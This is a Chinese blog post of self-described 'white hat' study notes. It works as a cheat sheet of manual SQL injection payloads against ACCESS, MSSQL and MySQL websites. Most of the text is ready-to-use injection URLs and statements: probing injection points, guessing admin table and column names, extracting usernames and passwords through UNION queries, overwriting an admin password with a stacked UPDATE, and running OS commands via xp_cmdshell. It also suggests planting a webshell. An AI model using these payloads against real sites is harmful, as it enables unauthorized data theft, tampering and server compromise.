【白帽子学习笔记14】SQL注入常用语句

最新推荐文章于 2024-03-10 15:41:53 发布
最新推荐文章于 2024-03-10 15:41:53 发布
阅读量547 收藏 4
点赞数
分类专栏: 白 帽 子 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/python_LC_nohtyp/article/details/106862663
版权

【白帽子学习笔记14】SQL注入常用语句

目前网站中使用的最多的数据库要算是 ACCESS、SQL Server(MSSQL)、MySQL 这三个了,所以这里的手工注入,我就以他们三个数据库来分成三 小节,讲述在不同的数据库下不同的注入方法。

文章目录

1、ACCESS

验证是否有漏洞

  • http://www.xxx.com/xx.asp?id=x and 1=1
  • http://www.xxx.com/xx.asp?id=x and 1=2

判断数据库类型

  • http://www.xxx.com/xx.asp?id=x and user>0
    ACESS数据库返回的数据库错误中一般会含有 “Microsoft JET Database”

猜数据库表名

猜解表名的语句为在注入点后加 上and exists (select * from 表名)或者and exists (select count from 表名)

  • 猜测数据库中有叫做Keter的表,那就输入http://www.xxx.com/xx.asp?id=x and exists (select * from Keter),如果有就返回正常,没有就有返回报错在这里插入图片描述
    一般常见的表名有:admin、a_admin、x_admin、m_admin、adminuser、admin_user、 article_admin、administrator、manager、member、memberlist、user、users、userinfo、 user_info、admin_userinfo、userlist、user_list、login、用户、密码、会员、登陆、 movie、movies、news、password、clubconfig、config、company、book、art、bbs、dv_admin
    等等。

  • 猜完表名就应该猜列名了 http://www.xxx.com/xx.asp?id=x and exists (select admin_name from admin) 把select中的*换成具体的名字即可
    一般常见的列名有:id、adminid、admin_id、adminuser、admin_user、adminuserid、 admin_userid、adminusername、admin_username、adminname、admin_name、adminpwd、 admin_pwd、adminpass、admin_pass、adminpassword、admin_password、administrator、 administrators、usr、usr_n、username、usr_name、usrpass、user_pass、password、 userpassword、user_password、pwd、userpwd、user_pwd、useradmin、user_admin、p_word、 passwd、pass_wd、yonghu、用户、用户名、mima、密码、dw、oklook等等。

  • 猜列的长度: http://www.xxx.com/xx.asp?id=x and (select top 1 len(adminname) from config)>1、>2、>3、>4

  • 猜第N行的长度:http://www.xxx.com/xx.asp?id=x and (select top N len(adminname) from config)>x

ASP+ACCESS 的注入攻击,我们得到用户名和密码也就完成了。 如果我们要继续入侵的话,只有进入后台,看能否上传木马或利用一句话木马来得到

2、SQL Server(MSSQL)

确认当前数据库的用户名

  • http://www.xxx.com/xxx.asp?id=xx and user>0
    在这里插入图片描述
    虽然 and user>0 很简单,但却包含了 SQLServer 特有注入方法的精髓。让我们来看看它的含义: 首先,前面的语句是正常的,重点在 and user>0,因为 user 是 SQLServer 的一个内置变量, 它的值是当前连接的用户名,类型为 nvarchar。而这里我们拿一个 nvarchar 的值跟 int 的数的 0 比较,系统会先试图将 nvarchar 的值转成 int 型,当然,转的过程中肯定会出错, SQLServer 的出错提示是:将 nvarchar 值“abc” 转换数据类型为 int 的列时发生语法错 误,呵呵,abc 正是变量 user 的值,这样,不废吹灰之力就拿到了数据库的用户名。还有 在我们的 SQLServer 数据库里的用户 sa 是个等同 Adminstrators 权限的角色,拿到了 sa 权限,几乎肯定可以拿到主机的 Administrator 了。而我们上面的方法可以很方便的测试 出是否是用 sa 登录,如果是 sa 登录那么返回的错误提示是将”dbo”转换成 int 的列发生错误,而不是”sa”

获取用户的数据信息

  • 暴当前表中的列:http://www.xxx.com/xxx.asp?id=xx having 1=1--
  • 暴任意表名和 列名的方法:and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1。其中N就是代表数据库中的第N个表
  • 暴任意表中的任意列:and (select top 1 col_name(object_id('表名'),N) from sysobjects)>1
  • 暴出数据库中的数据:and (select top 1 列名 from 表名 where id=N)>1

url中带的是字符怎么办?

  • http://www.xxx.com/xxx.asp?action=value' and 1=1

修改数据库中的数据

  • ;update 表名 set 列名='内容' where 条件 比如 http://www.xxx.com/xxx.asp?id=xx;update admin set password='123' where user name= 'Keter'

获取数据库名和数据库版本和权限

  • 获取数据库版本:and (sel ect @@versi on)>0
  • 获取数据库名:and db_name()>0
  • 获取数据库权限:http://www.xxx.com/xxx.asp?id=xx and db_name()>0
  • 获取数据是否支持多句查询:http://www.xxx.com/xxx.asp?id=xx and (select count(1) from [sysobjects])>=0

MSSQL的扩展功能

  • 查看服务器C盘的目录:;exec master..xp_cmd shell 'dir c:\'(XP系统)

3、MYSQL

PHP 与 MySQL 是黄金组合,下面就以他们来作为 MySQL 注入的平台吧

数据库版本

在 MySQL 版本 4(包括版本4)及以上版本新增了一个联合查询查询(UNION)的功能, 比如 SQL 语句 1 UNION SQL 语句 2,提交之后我们的 SQL 语句 1 和 SQL 语句 2 都会被执行, 通过联合查询这个字面意思也是可以理解的。正是这个功能使得 MySQL 发生 SQL 注入漏洞的 危险性大大的得到提高,利用它我们可以轻易的获取数据库中其他数据表的信息。而在版本 4 以下,确不支持这个功能,而且由于 PHP 中的 mysql_query 函数限制了只能查询一个 SQL 语句,即使你使用分号把多个 SQL 语句组合到一起嵌入 mysql_query 函数,实际上也只有第 一个 SQL 语句被提交给 MySQL,所以那个时候 MySQL 的注入并不是特别的严重,而如今确变了。

  • and ord(mid(version(),1,1))>51/* 返回正常版本大于4.0 ,返回错误版本小于4.0。

  • /*!...*/,如果返回页面是错误的话那几乎可以确定网站后台数据库为 MySQL 了,然后我们还可以进一步确认具体的版本,/*!30000%20s*/(判断版本是否小于3.0)其他的类似

  • 确认字段数目:

    • 方法1:UNION ,要求前面的 SQL 语句 1 和后面的 SQL 语句 2 中的字段数要相同,否则就会出错。我们可以提交 union select 1,1,1,1 及其类似的语句。通过不断的增 加 1 的个数,在结合返回信息可以迅速确定该查询语句前面查询的字段数目。
    • 方法2:order by 利用 order by 后加数字,MySQL 会解释成按照第几列排序,如果查询没有我们提交的数字的那么多页就会返回错误。

  • 获取当前数据库的表名:union select 字段数 from 表名 ,中间的字段数大家要注意了,它是这样表示的:假如 有三个字段,那么就应该这样:1,2,3。当然了这还是猜解表名。

  • 查询用户名和密码:union select 1,password from admin union select 1,username from admin 当然你可以加上where id = *

  • 判断是否是root权限:and ord(mid(user(),1,1))=114/*,正常的就是root权限

AndSonder
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
SQL注入语句(详细)
热门推荐
m0_64118193的博客
06-02 2万+
目录一、联合查询1.判断注入点 2.查询字段 3.确定回显点 4.基础查询信息二、报错注入1.substr()函数 2.查询语句三、布尔盲注1.length( )函数 2.substr( )函数 3.ord( )函数 4.查询语句四、时间盲注1.sleep( )延迟函数 2.查询语句五、堆叠注入1.查询语句***爆库语句SQLMAP工具的使用参数用户可控:前端传递给后端的参数内容是用户可以控制的参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询当传入的id参数为
超全SQL注入实用语句
weixin_44866139的博客
04-28 1万+
目录判断是否存在注入判断列数Union联合注入爆数据库爆表爆字段爆数据sql盲注导入导出文件Post注入修改useragent:修改referer:修改cookiegroup_concat二次排序注入绕过 or 和 and 过滤绕过空格的过滤宽字节注入堆叠注入order by后的injectionmysqli_multi_query()函数 判断是否存在注入 在 http://127.0.0.1/...
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 5467
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
SQL注入
qq_63785498的博客
06-10 2354
SQL注入语句:1、1';-- -查看有哪些库2、1';-- -查看有哪些表3、1';-- -查看表里面有哪些字段4、1';-- -查看表里面所有字段的内容。
sql注入 黑客攻击 帽子讲web安全
08-03
如果做到了这一点,那么帽子们就在SQL Injection的局部对抗中化被动为主动了。 跟机场安全检查进行类比。通过一个安全检查(过滤,净化)的过程,可以梳理未知的人或物,使其变得可信任。被划分出来的具有不同...
帽子修炼第二步(漏洞篇)[SQL注入]-③
05-29
"帽子修炼第二步(漏洞篇)[SQL注入]-③"这个主题主要聚焦于网络安全中的一个重要话题——SQL注入帽子,指的是那些通过合法手段发现并报告系统安全漏洞的专业人士,与黑客形成鲜明对比。他们对网络系统的深入...
帽子学习路线
03-21
一名帽子的心路历程.pdf
08-08
Kiven原本是一名网络运维人员,并不涉信息安全。但在某种机缘巧合下,进入了网络安全这个行当,依托着自己的运维经验,从零学习安全知识,现已有了自己的安全工作室。学习信息安全,任何人任何时候都不晚。
SQL注入之如何检测与判断详细过程
01-31
SQL注入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf ...那么作为帽子,该如何判断是否存在注入! 这里附上我挖bat各大厂商时用的判断注入方法。下一期再分享如何过waf。
sql注入
qq_49714982的博客
04-06 1600
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入详解
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
SQL注入总结
学生
06-27 956
产生宽字节注入的原因涉及了编码转换的问题,当我们的mysql使用GBK编码后,同时两个字符的前一个字符ASCII码大于128时,会将两个字符认成一个汉字,那么大家像一个,如果存在过滤我们输入的函数(addslashes()、mysql_real_escape_string()、mysql_escape_string()、Magic_quotes_gpc)会将我们的输入进行转义。二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入
SQL注入基础语句大全
Jeromeyoung
03-01 1万+
尽管语句很多,但是上手操作才是硬道理,话不多说直接进行SQL注入基础介绍。 原理:服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。 一: 用户登陆判断语句: SELECT*FROMusersWHEREuser='uname'ANDpassword='pass' SELECT * FROM users WHE...
sql注入--基本注入语句学习笔记
超人学飞的日子
05-31 1万+
接触到sql注入知识,做了一些常识,这里做一个完整的记录。一,联合查询联合查询是拼接在原查询语句下,要求结果数量与原结果数量相同。1,2,3并无特殊含义,换成其他数字或字符串也可以,这里只是站位表示一下。二,注释语句sql注入时要注释掉后面的部分才能使整个语句正确运行,这里介绍几种方法。1,#注释符此时后面的limit 0,30并没有生效。2,--空格注释符 注意在--后面有个空格,否则会报错,不...
常用SQL注入语句大全
cainiao199020的博客
12-23 2709
1.判断有无注入点 整形参数判断 1、直接加’ 2、and 1=1 3、 and 1=2 如果1、3运行异常 2正常就存在注入 字符型判断 1、直接加’ 2、and ‘1’=‘1’ 3、 and ‘1’=‘2’ 搜索型: 关键字%’ and 1=1 and ‘%’=’% 关键字%’ and 1=2 and ‘%’=’% 如果1、3运行异常 2正常就存在注入 2.猜表一般的表的名称无非是admin ...
sql注入基础学习
最新发布
qq_48257021的博客
03-10 1334
4.判断一下数据库中的表,网址后加上:and (select count(*) from admin) 0返回正常,说明存在admin表。and (select count(*) from admin where ascii(substr(name,2,1))>=100)=1 结果为100,即字符d,重复上述过程,可以判断出帐号为admin。and (select count(*) from admin where ascii(substr(pwd,1,1))>=97)=1,返回正常,为字符a。
iOS安全深度剖析:从越狱插件到SQL注入
整本书以实战为导向,结合理论知识与实际案例,为IT安全从业者提供了一个深入了解iOS安全、渗透测试、SQL注入和代码审计的综合学习平台,旨在提高信息安全专业人员的防护技能,同时也警示普通用户注意网络安全,避免...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值